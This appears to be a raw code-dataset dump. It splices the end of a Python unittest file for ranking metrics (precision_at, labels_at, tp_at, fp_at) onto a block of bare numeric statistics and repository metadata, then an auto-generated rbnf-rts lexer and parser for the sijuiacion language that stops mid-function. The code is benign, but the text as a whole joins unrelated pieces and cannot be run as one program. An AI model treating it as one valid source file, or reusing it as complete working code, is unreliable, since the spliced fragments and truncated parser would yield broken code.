        y_true = np.array([1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
        precision, cutoff = precision_at(
            y_true, self._desc_scores(), proportion=0.10)
        self.assertEqual(precision, 1.0)
        self.assertEqual(cutoff, 100)

    def test_perfect_precision_with_nas(self):
        y_true = np.array([1, nan, 1, 1, 1, nan, 0, 0, 0, 0])
        precision, cutoff = precision_at(
            y_true, self._desc_scores(), proportion=0.10, ignore_nas=True)
        self.assertEqual(precision, 1.0)
        self.assertEqual(cutoff, 100)

    def test_baseline_precision(self):
        y_true = np.array([1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
        precision, cutoff = precision_at(
            y_true, self._desc_scores(), proportion=1.0)
        self.assertEqual(precision, 0.5)
        self.assertEqual(cutoff, 10)

    def test_baseline_precision_with_nas(self):
        y_true = np.array([nan, 1, nan, 1, 1, nan, nan, 0, 0, 0])
        precision, cutoff = precision_at(
            y_true, self._desc_scores(), proportion=1.0, ignore_nas=True)
        self.assertEqual(precision, 0.5)
        self.assertEqual(cutoff, 10)

    def test_proportion_less_than_zero(self):
        with self.assertRaises(ValueError):
            precision_at([1], [0], -0.1)

    def test_proportion_more_than_one(self):
        with self.assertRaises(ValueError):
            precision_at([1], [0], proportion=1.1)
class Test_labels_at(TestCase):
    """Tests for labels_at: labeled-entry count (or fraction) in the top slice."""

    @staticmethod
    def _desc_scores():
        # Fresh descending score vector per test (no shared mutable state).
        return np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])

    @staticmethod
    def _all_nan():
        return np.array([nan] * 10)

    def test_no_labels_at_1(self):
        count = labels_at(self._all_nan(), np.random.rand(1, 10),
                          proportion=0.01, normalize=False)
        self.assertEqual(count, 0)

    def test_no_labels_at_50(self):
        count = labels_at(self._all_nan(), np.random.rand(1, 10),
                          proportion=0.5, normalize=False)
        self.assertEqual(count, 0)

    def test_no_labels_at_100(self):
        count = labels_at(self._all_nan(), np.random.rand(1, 10),
                          proportion=1.0, normalize=False)
        self.assertEqual(count, 0)

    def test_one_label_at_10(self):
        y_true = np.array([1] + [nan] * 9)
        count = labels_at(y_true, self._desc_scores(),
                          proportion=0.1, normalize=False)
        self.assertEqual(count, 1)

    def test_one_label_at_10_norm(self):
        y_true = np.array([1] + [nan] * 9)
        fraction = labels_at(y_true, self._desc_scores(),
                             proportion=0.1, normalize=True)
        self.assertEqual(fraction, 1.0)

    def test_one_label_at_50(self):
        y_true = np.array([1] + [nan] * 9)
        count = labels_at(y_true, self._desc_scores(),
                          proportion=0.5, normalize=False)
        self.assertEqual(count, 1)

    def test_one_label_at_100(self):
        y_true = np.array([1] + [nan] * 9)
        count = labels_at(y_true, self._desc_scores(),
                          proportion=1.0, normalize=False)
        self.assertEqual(count, 1)

    def test_60_labels_at_60(self):
        y_true = np.array([1] * 6 + [nan] * 4)
        count = labels_at(y_true, self._desc_scores(),
                          proportion=0.6, normalize=False)
        self.assertEqual(count, 6)

    def test_60_labels_at_60_norm(self):
        y_true = np.array([1] * 6 + [nan] * 4)
        fraction = labels_at(y_true, self._desc_scores(),
                             proportion=0.6, normalize=True)
        self.assertEqual(fraction, 1.0)

    def test_60_labels_at_60_mixed_values(self):
        # 0-labels count as labeled entries too.
        y_true = np.array([1, 0, 0, 1, 0, 1, nan, nan, nan, nan])
        count = labels_at(y_true, self._desc_scores(),
                          proportion=0.6, normalize=False)
        self.assertEqual(count, 6)

    def test_60_labels_at_60_norm_mixed_values(self):
        y_true = np.array([0, 0, 0, 1, 0, 1, nan, nan, nan, nan])
        fraction = labels_at(y_true, self._desc_scores(),
                             proportion=0.6, normalize=True)
        self.assertEqual(fraction, 1.0)

    def test_60_labels_at_30(self):
        y_true = np.array([1] * 6 + [nan] * 4)
        count = labels_at(y_true, self._desc_scores(),
                          proportion=0.3, normalize=False)
        self.assertEqual(count, 3)

    def test_60_labels_at_30_norm(self):
        y_true = np.array([1] * 6 + [nan] * 4)
        fraction = labels_at(y_true, self._desc_scores(),
                             proportion=0.3, normalize=True)
        self.assertEqual(fraction, 0.5)

    def test_proportion_less_than_zero(self):
        with self.assertRaises(ValueError):
            labels_at([1], [0], -0.1)

    def test_proportion_more_than_one(self):
        with self.assertRaises(ValueError):
            labels_at([1], [0], proportion=1.1)
class Test_tp_at(TestCase):
    """Tests for tp_at: true-positive count within the top proportion."""

    @staticmethod
    def _desc_scores():
        # Fresh descending score vector per test.
        return np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])

    def test_with_nas(self):
        y_true = np.array([1, nan, 1, 1, 1, 1, 1, 1, 1, nan])
        self.assertEqual(
            tp_at(y_true, self._desc_scores(), proportion=0.1), 1)

    def test_all_tp_at_10(self):
        y_true = np.array([1] * 10)
        self.assertEqual(
            tp_at(y_true, self._desc_scores(), proportion=0.1), 1)

    def test_all_tp_at_50(self):
        y_true = np.array([1] * 10)
        self.assertEqual(
            tp_at(y_true, self._desc_scores(), proportion=0.5), 5)

    def test_all_tp_at_100(self):
        y_true = np.array([1] * 10)
        self.assertEqual(
            tp_at(y_true, self._desc_scores(), proportion=1.0), 10)

    def test_no_tp_at_50(self):
        y_true = np.array([0] * 10)
        self.assertEqual(
            tp_at(y_true, self._desc_scores(), proportion=0.5), 0)

    def test_no_tp_at_100(self):
        y_true = np.array([0] * 10)
        self.assertEqual(
            tp_at(y_true, self._desc_scores(), proportion=1.0), 0)

    def test_some_tp_at_10(self):
        y_true = np.array([1, 0, 0, 0, 0, 0, 0, 1, 1, 1])
        self.assertEqual(
            tp_at(y_true, self._desc_scores(), proportion=0.1), 1)

    def test_some_tp_at_50(self):
        y_true = np.array([1, 1, 0, 0, 1, 0, 0, 1, 1, 0])
        self.assertEqual(
            tp_at(y_true, self._desc_scores(), proportion=0.5), 3)

    def test_some_tp_at_100(self):
        y_true = np.array([0, 0, 0, 0, 1, 0, 0, 1, 1, 1])
        self.assertEqual(
            tp_at(y_true, self._desc_scores(), proportion=1.0), 4)

    def test_proportion_less_than_zero(self):
        with self.assertRaises(ValueError):
            tp_at([1], [0], -0.1)

    def test_proportion_more_than_one(self):
        with self.assertRaises(ValueError):
            tp_at([1], [0], proportion=1.1)
class Test_fp_at(TestCase):
    """Tests for fp_at: false-positive count within the top proportion."""

    @staticmethod
    def _desc_scores():
        # Fresh descending score vector per test.
        return np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1])

    def test_with_nas(self):
        y_true = np.array([0, nan, 1, 1, 1, 1, 1, 1, 1, nan])
        self.assertEqual(
            fp_at(y_true, self._desc_scores(), proportion=0.1), 1)

    def test_all_fp_at_10(self):
        y_true = np.array([0] * 10)
        self.assertEqual(
            fp_at(y_true, self._desc_scores(), proportion=0.1), 1)

    def test_all_fp_at_50(self):
        y_true = np.array([0] * 10)
        self.assertEqual(
            fp_at(y_true, self._desc_scores(), proportion=0.5), 5)

    def test_all_fp_at_100(self):
        y_true = np.array([0] * 10)
        self.assertEqual(
            fp_at(y_true, self._desc_scores(), proportion=1.0), 10)

    def test_no_fp_at_50(self):
        y_true = np.array([1] * 5 + [0] * 5)
        self.assertEqual(
            fp_at(y_true, self._desc_scores(), proportion=0.5), 0)

    def test_no_fp_at_100(self):
        y_true = np.array([1] * 10)
        self.assertEqual(
            fp_at(y_true, self._desc_scores(), proportion=1.0), 0)

    def test_some_fp_at_10(self):
        y_true = np.array([0, 0, 0, 0, 0, 0, 0, 1, 1, 1])
        self.assertEqual(
            fp_at(y_true, self._desc_scores(), proportion=0.1), 1)

    def test_some_fp_at_50(self):
        y_true = np.array([1, 1, 0, 0, 1, 0, 0, 1, 1, 0])
        self.assertEqual(
            fp_at(y_true, self._desc_scores(), proportion=0.5), 2)

    def test_some_fp_at_100(self):
        y_true = np.array([0, 0, 0, 0, 1, 0, 0, 1, 1, 1])
        self.assertEqual(
            fp_at(y_true, self._desc_scores(), proportion=1.0), 6)

    def test_proportion_less_than_zero(self):
        with self.assertRaises(ValueError):
            fp_at([1], [0], -0.1)

    def test_proportion_more_than_one(self):
        with self.assertRaises(ValueError):
            fp_at([1], [0], proportion=1.1)
| 40.99373
| 81
| 0.584002
| 2,510
| 13,077
| 2.874104
| 0.033466
| 0.03715
| 0.034516
| 0.034932
| 0.943721
| 0.910452
| 0.878431
| 0.854034
| 0.810507
| 0.777655
| 0
| 0.126518
| 0.244475
| 13,077
| 318
| 82
| 41.122642
| 0.603644
| 0
| 0
| 0.598394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.228916
| 1
| 0.220884
| false
| 0
| 0.028112
| 0
| 0.273092
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a142384310a68db7dae77c0e7eabc09efec8d874
| 162,170
|
py
|
Python
|
sijuiacion_lang/parser.py
|
RemuLang/sijuiacion-lang
|
e3b5be79fb7afadc0790311e612ddd430b3f0b9d
|
[
"MIT"
] | 21
|
2019-10-13T14:11:32.000Z
|
2021-12-14T02:42:12.000Z
|
sijuiacion_lang/parser.py
|
RemuLang/sijuiacion-lang
|
e3b5be79fb7afadc0790311e612ddd430b3f0b9d
|
[
"MIT"
] | 1
|
2020-01-07T13:14:46.000Z
|
2020-01-09T16:58:07.000Z
|
sijuiacion_lang/parser.py
|
RemuLang/sijuiacion-lang
|
e3b5be79fb7afadc0790311e612ddd430b3f0b9d
|
[
"MIT"
] | 1
|
2020-08-13T16:17:09.000Z
|
2020-08-13T16:17:09.000Z
|
# this file is auto-generated by RBNF.hs and the Python package rbnf-rts
from rbnf_rts.rbnf_linker import link
from rbnf_rts.utils import ImmutableMap
from rbnf_rts.lexical import *
# Public API of this generated module: the lexical token table, the lexer
# entry point, and the parser factory.
__all__ = ['lexicals', 'run_lexer', 'mk_parser']
# Generated lexer definition (RBNF.hs / rbnf-rts output — do not hand-edit):
# regex token classes (PY, INT, ID, STRING, whitespace W), literal tokens,
# a reserved-word map onto 'quote ...' token names, and a fixed numbering of
# every token id used by the parser tables below.
(lexicals, run_lexer) = lexer(r(PY='#([^\\\\#]+|\\\\.)*?#'), r(INT='\\d+'), r(ID='[-$\\.a-zA-Z_\\u4e00-\\u9fa5][\\-\\!-$\\.a-zA-Z0-9_\\u4e00-\\u9fa5]*'), r(STRING='"([^\\\\"]+|\\\\.)*?"'), r(W='\\s+'), l['}'], l['|'], l['{'], l[']'], l['['], l['=>'], ignores=['W'], reserved_map=ImmutableMap.from_dict({'runtime': 'quote runtime', 'load': 'quote load', 'store': 'quote store', 'deref': 'quote deref', 'deref!': 'quote deref!', 'const': 'quote const', 'extern': 'quote extern', 'glob': 'quote glob', 'print': 'quote print', 'pop': 'quote pop', 'prj': 'quote prj', 'prj!': 'quote prj!', 'indir': 'quote indir', 'rot': 'quote rot', 'dup': 'quote dup', 'goto': 'quote goto', 'goto-if': 'quote goto-if', 'goto-if-not': 'quote goto-if-not', 'label': 'quote label', 'blockaddr': 'quote blockaddr', 'call': 'quote call', 'list': 'quote list', 'tuple': 'quote tuple', 'return': 'quote return', 'line': 'quote line', 'defun': 'quote defun', '{': 'quote {', '}': 'quote }', 'switch': 'quote switch', '|': 'quote |', '=>': 'quote =>', '_': 'quote _', 'document': 'quote document', 'filename': 'quote filename', 'free': 'quote free', 'name': 'quote name', 'args': 'quote args', 'firstlineno': 'quote firstlineno', '[': 'quote [', ']': 'quote ]'}), numbering={'BOF': 0, 'EOF': 1, 'quote runtime': 2, 'quote load': 3, 'quote store': 4, 'quote deref': 5, 'quote deref!': 6, 'quote const': 7, 'quote extern': 8, 'quote glob': 9, 'quote print': 10, 'quote pop': 11, 'quote prj': 12, 'quote prj!': 13, 'quote indir': 14, 'quote rot': 15, 'quote dup': 16, 'quote goto': 17, 'quote goto-if': 18, 'quote goto-if-not': 19, 'quote label': 20, 'quote blockaddr': 21, 'quote call': 22, 'quote list': 23, 'quote tuple': 24, 'quote return': 25, 'quote line': 26, 'quote defun': 27, 'quote {': 28, 'quote }': 29, 'quote switch': 30, 'quote |': 31, 'quote =>': 32, 'quote _': 33, 'quote document': 34, 'quote filename': 35, 'quote free': 36, 'quote name': 37, 'quote args': 38, 'quote firstlineno': 39, 'quote [': 40, 'quote ]': 41, 'PY': 42, 'INT': 43, 'ID': 44, 'STRING': 45, 'W': 46})
def mk_parser():
from rbnf_rts.rts import AST as prim__mk__ast, Cons as prim__cons, _nil as prim__nil
def lr_step_Attrs(_slot_0, prim__state, prim__tokens):
    # One left-recursion step for Attrs: parse a single additional Attr and
    # fold it into the chain.  `_slot_0` is the Attrs node accumulated so far.
    # Returns (True, new Attrs AST) on success, or the (False, error-list)
    # result of parse_Attr unchanged on failure.
    result = parse_Attr(prim__state, prim__tokens)
    if result[0] is False:
        # Propagate parse_Attr's failure as-is.
        return result
    # Wrap (previous chain, new Attr) into a fresh 'Attrs' node.
    return (True, prim__mk__ast('Attrs', (_slot_0, result[1])))
def lr_loop_Attrs(_slot_0, prim__state, prim__tokens):
    # Drive lr_step_Attrs until it fails, accumulating the Attrs chain.
    # `checkpoint` always holds the token offset before the most recent step.
    accepted = _slot_0
    checkpoint = prim__tokens.offset
    attempt = lr_step_Attrs(accepted, prim__state, prim__tokens)
    while attempt[0] is not False:
        checkpoint = prim__tokens.offset
        accepted = attempt[1]
        attempt = lr_step_Attrs(accepted, prim__state, prim__tokens)
    # Identity check mirrors the generated code: the offset attribute is the
    # very same object when the failing step consumed no input.
    if prim__tokens.offset is checkpoint:
        # Clean stop: the failing step ate nothing, so the chain is complete.
        return (True, accepted)
    # The failing step consumed tokens; surface its error instead.
    return attempt
def lr_step_IDList(_slot_0, prim__state, prim__tokens):
    # One left-recursion step for IDList: consume a single ID token
    # (idint 44) and extend the chain.  `_slot_0` is the IDList so far.
    expected = 44
    try:
        token = prim__tokens.array[prim__tokens.offset]
        if token.idint is expected:
            prim__tokens.offset += 1
        else:
            token = None
    except IndexError:
        # Ran off the end of the token stream.
        token = None
    if token is None:
        failure = (prim__tokens.offset, 'ID not match')
        return (False, prim__cons(failure, prim__nil))
    return (True, prim__mk__ast('IDList', (_slot_0, token)))
def lr_loop_IDList(_slot_0, prim__state, prim__tokens):
    # Drive lr_step_IDList until it fails, accumulating the IDList chain.
    # `checkpoint` always holds the token offset before the most recent step.
    accepted = _slot_0
    checkpoint = prim__tokens.offset
    attempt = lr_step_IDList(accepted, prim__state, prim__tokens)
    while attempt[0] is not False:
        checkpoint = prim__tokens.offset
        accepted = attempt[1]
        attempt = lr_step_IDList(accepted, prim__state, prim__tokens)
    # Identity check mirrors the generated code: same offset object means the
    # failing step consumed no input.
    if prim__tokens.offset is checkpoint:
        return (True, accepted)
    # The failing step consumed tokens; report its error.
    return attempt
def lr_step_Instrs(_slot_0, prim__state, prim__tokens):
    # One left-recursion step for Instrs: parse a single additional Instr and
    # fold it into the chain.  `_slot_0` is the Instrs node accumulated so far.
    result = parse_Instr(prim__state, prim__tokens)
    if result[0] is False:
        # Propagate parse_Instr's failure as-is.
        return result
    # Wrap (previous chain, new Instr) into a fresh 'Instrs' node.
    return (True, prim__mk__ast('Instrs', (_slot_0, result[1])))
def lr_loop_Instrs(_slot_0, prim__state, prim__tokens):
    # Drive lr_step_Instrs until it fails, accumulating the Instrs chain.
    # `checkpoint` always holds the token offset before the most recent step.
    accepted = _slot_0
    checkpoint = prim__tokens.offset
    attempt = lr_step_Instrs(accepted, prim__state, prim__tokens)
    while attempt[0] is not False:
        checkpoint = prim__tokens.offset
        accepted = attempt[1]
        attempt = lr_step_Instrs(accepted, prim__state, prim__tokens)
    # Identity check mirrors the generated code: same offset object means the
    # failing step consumed no input.
    if prim__tokens.offset is checkpoint:
        return (True, accepted)
    # The failing step consumed tokens; report its error.
    return attempt
def lr_step_JumpCases(_slot_0, prim__state, prim__tokens):
    # One left-recursion step for JumpCases: consume a '|' separator token
    # (idint 31), then parse one JumpCase.  The new node's children are
    # ((previous chain, bar token), case) — matching the generated layout.
    separator = 31
    try:
        token = prim__tokens.array[prim__tokens.offset]
        if token.idint is separator:
            prim__tokens.offset += 1
        else:
            token = None
    except IndexError:
        # Ran off the end of the token stream.
        token = None
    if token is None:
        failure = (prim__tokens.offset, 'quote | not match')
        return (False, prim__cons(failure, prim__nil))
    left = (_slot_0, token)
    case = parse_JumpCase(prim__state, prim__tokens)
    if case[0] is False:
        # The '|' stays consumed; propagate parse_JumpCase's failure.
        return case
    return (True, prim__mk__ast('JumpCases', (left, case[1])))
def lr_loop_JumpCases(_slot_0, prim__state, prim__tokens):
    # Drive lr_step_JumpCases until it fails, accumulating the JumpCases chain.
    # `checkpoint` always holds the token offset before the most recent step.
    accepted = _slot_0
    checkpoint = prim__tokens.offset
    attempt = lr_step_JumpCases(accepted, prim__state, prim__tokens)
    while attempt[0] is not False:
        checkpoint = prim__tokens.offset
        accepted = attempt[1]
        attempt = lr_step_JumpCases(accepted, prim__state, prim__tokens)
    # Identity check mirrors the generated code: same offset object means the
    # failing step consumed no input.
    if prim__tokens.offset is checkpoint:
        return (True, accepted)
    # The failing step consumed tokens; report its error.
    return attempt
def parse_Attr(prim__state, prim__tokens):
    # Parse one Attr node: an attribute keyword followed by its payload.
    # Dispatch on the lookahead token's idint (see the `numbering` table):
    #   37 'name' / 35 'filename' / 34 'document' -> STRING payload (idint 45)
    #   39 'firstlineno'                          -> INT payload    (idint 43)
    #   36 'free' / 38 'args'                     -> IDs payload
    # Returns (True, Attr AST) or (False, cons-list of (offset, message)).
    def advance():
        # Unconditionally consume the current token and return it.
        here = prim__tokens.offset
        token = prim__tokens.array[here]
        prim__tokens.offset = here + 1
        return token

    def match(kind):
        # Consume a token whose idint is `kind`; None when it does not match
        # or the stream is exhausted.
        try:
            token = prim__tokens.array[prim__tokens.offset]
            if token.idint is kind:
                prim__tokens.offset += 1
                return token
        except IndexError:
            pass
        return None

    def fail(position, message):
        # Standard (False, error-list) result shape.
        return (False, prim__cons((position, message), prim__nil))

    begin = prim__tokens.offset
    if len(prim__tokens.array) <= begin:
        return fail(begin, 'Attr got EOF')
    head_kind = prim__tokens.array[begin].idint
    if head_kind == 37 or head_kind == 35 or head_kind == 34:
        # name / filename / document: keyword then a STRING literal.
        head = advance()
        payload = match(45)
        if payload is None:
            return fail(prim__tokens.offset, 'STRING not match')
        return (True, prim__mk__ast('Attr', (head, payload)))
    if head_kind == 39:
        # firstlineno: keyword then an INT literal.
        head = advance()
        payload = match(43)
        if payload is None:
            return fail(prim__tokens.offset, 'INT not match')
        return (True, prim__mk__ast('Attr', (head, payload)))
    if head_kind == 36 or head_kind == 38:
        # free / args: keyword then a bracketed IDs list.
        head = advance()
        sub = parse_IDs(prim__state, prim__tokens)
        if sub[0] is False:
            # The keyword stays consumed; propagate parse_IDs' failure.
            return sub
        return (True, prim__mk__ast('Attr', (head, sub[1])))
    return fail(begin, 'Attr lookahead failed')
def parse_Attrs(prim__state, prim__tokens):
    # Parse a non-empty Attr sequence: one mandatory Attr seeds a single-child
    # 'Attrs' node, then lr_loop_Attrs folds in any further Attrs.
    first = parse_Attr(prim__state, prim__tokens)
    if first[0] is False:
        # No leading Attr: propagate the failure unchanged.
        return first
    seed = prim__mk__ast('Attrs', (first[1],))
    return lr_loop_Attrs(seed, prim__state, prim__tokens)
def parse_IDList(prim__state, prim__tokens):
    # Parse a non-empty ID sequence: one mandatory ID token (idint 44) seeds
    # a single-child 'IDList' node, then lr_loop_IDList folds in the rest.
    expected = 44
    try:
        token = prim__tokens.array[prim__tokens.offset]
        if token.idint is expected:
            prim__tokens.offset += 1
        else:
            token = None
    except IndexError:
        # Ran off the end of the token stream.
        token = None
    if token is None:
        failure = (prim__tokens.offset, 'ID not match')
        return (False, prim__cons(failure, prim__nil))
    seed = prim__mk__ast('IDList', (token,))
    return lr_loop_IDList(seed, prim__state, prim__tokens)
def parse_IDs(prim__state, prim__tokens):
    # Parse a bracketed IDs node: '[' (idint 40) followed by either an
    # immediate ']' (idint 41, empty list) or an IDList then ']'.
    # Returns (True, IDs AST) or (False, cons-list of (offset, message)).
    def match(kind):
        # Consume a token whose idint is `kind`; None on mismatch or EOF.
        try:
            token = prim__tokens.array[prim__tokens.offset]
            if token.idint is kind:
                prim__tokens.offset += 1
                return token
        except IndexError:
            pass
        return None

    def fail(position, message):
        # Standard (False, error-list) result shape.
        return (False, prim__cons((position, message), prim__nil))

    lbracket = match(40)
    if lbracket is None:
        return fail(prim__tokens.offset, 'quote [ not match')
    here = prim__tokens.offset
    if len(prim__tokens.array) <= here:
        return fail(here, 'IDs got EOF')
    ahead = prim__tokens.array[here].idint
    if ahead == 41:
        # Empty list: consume the closing ']' directly.
        rbracket = prim__tokens.array[here]
        prim__tokens.offset = here + 1
        return (True, prim__mk__ast('IDs', (lbracket, rbracket)))
    if ahead == 44:
        # Non-empty: an IDList followed by the closing ']'.
        body = parse_IDList(prim__state, prim__tokens)
        if body[0] is False:
            return body
        rbracket = match(41)
        if rbracket is None:
            return fail(prim__tokens.offset, 'quote ] not match')
        return (True, prim__mk__ast('IDs', (lbracket, body[1], rbracket)))
    return fail(here, 'IDs lookahead failed')
def parse_Instr(prim__state, prim__tokens):
lcl_0 = prim__tokens.offset
_off_0 = lcl_0
lcl_0 = (len(prim__tokens.array) > (prim__tokens.offset + 0))
if lcl_0:
lcl_2 = prim__tokens.array[(prim__tokens.offset + 0)]
lcl_2 = lcl_2.idint
if (lcl_2 == 24):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 43
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'INT not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 30):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = prim__tokens.offset
_off_1 = lcl_3
lcl_3 = (len(prim__tokens.array) > (prim__tokens.offset + 0))
if lcl_3:
lcl_5 = prim__tokens.array[(prim__tokens.offset + 0)]
lcl_5 = lcl_5.idint
if (lcl_5 == 31):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_6 = _py_local_t
_slot_1 = lcl_6
lcl_6 = parse_JumpCases(prim__state, prim__tokens)
_slot_2_check = lcl_6
lcl_6 = _slot_2_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_2_check
else:
lcl_7 = _slot_2_check[1]
lcl_7 = lcl_7
_slot_2 = lcl_7
lcl_7 = (_slot_0, _slot_1, _slot_2)
lcl_7 = prim__mk__ast('Instr', lcl_7)
_slot_local__1 = lcl_7
lcl_7 = (True, _slot_local__1)
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 33):
lcl_6 = parse_JumpCases(prim__state, prim__tokens)
_slot_1_check = lcl_6
lcl_6 = _slot_1_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_1_check
else:
lcl_7 = _slot_1_check[1]
lcl_7 = lcl_7
_slot_1 = lcl_7
lcl_7 = (_slot_0, _slot_1)
lcl_7 = prim__mk__ast('Instr', lcl_7)
_slot_local__1 = lcl_7
lcl_7 = (True, _slot_local__1)
lcl_6 = lcl_7
lcl_4 = lcl_6
elif (lcl_5 == 43):
lcl_6 = parse_JumpCases(prim__state, prim__tokens)
_slot_1_check = lcl_6
lcl_6 = _slot_1_check[0]
lcl_6 = (lcl_6 is False)
if lcl_6:
lcl_6 = _slot_1_check
else:
lcl_7 = _slot_1_check[1]
lcl_7 = lcl_7
_slot_1 = lcl_7
lcl_7 = (_slot_0, _slot_1)
lcl_7 = prim__mk__ast('Instr', lcl_7)
_slot_local__1 = lcl_7
lcl_7 = (True, _slot_local__1)
lcl_6 = lcl_7
lcl_4 = lcl_6
else:
lcl_6 = (_off_1, 'Instr lookahead failed')
lcl_6 = prim__cons(lcl_6, prim__nil)
lcl_6 = lcl_6
lcl_6 = (False, lcl_6)
lcl_4 = lcl_6
lcl_3 = lcl_4
else:
lcl_4 = (_off_1, 'Instr got EOF')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 4):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'ID not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 15):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 43
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
lcl_4 = (lcl_4, 'INT not match')
lcl_4 = prim__cons(lcl_4, prim__nil)
lcl_4 = lcl_4
lcl_4 = (False, lcl_4)
lcl_3 = lcl_4
else:
lcl_4 = (_slot_0, _slot_1)
lcl_4 = prim__mk__ast('Instr', lcl_4)
_slot_local__1 = lcl_4
lcl_4 = (True, _slot_local__1)
lcl_3 = lcl_4
lcl_1 = lcl_3
elif (lcl_2 == 25):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = (_slot_0,)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_1 = lcl_3
elif (lcl_2 == 13):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = (_slot_0,)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_1 = lcl_3
elif (lcl_2 == 12):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = (_slot_0,)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_1 = lcl_3
elif (lcl_2 == 10):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = (_slot_0,)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_1 = lcl_3
elif (lcl_2 == 11):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = (_slot_0,)
lcl_3 = prim__mk__ast('Instr', lcl_3)
_slot_local__1 = lcl_3
lcl_3 = (True, _slot_local__1)
lcl_1 = lcl_3
elif (lcl_2 == 3):
_py_local_i = prim__tokens.offset
_py_local_t = prim__tokens.array[_py_local_i]
prim__tokens.offset = (_py_local_i + 1)
lcl_3 = _py_local_t
_slot_0 = lcl_3
lcl_3 = 44
try:
_py_local_tk = prim__tokens.array[prim__tokens.offset]
if (_py_local_tk.idint is lcl_3):
prim__tokens.offset += 1
else:
_py_local_tk = None
except IndexError:
_py_local_tk = None
lcl_3 = _py_local_tk
_slot_1 = lcl_3
lcl_3 = (_slot_1 is None)
if lcl_3:
lcl_4 = prim__tokens.offset
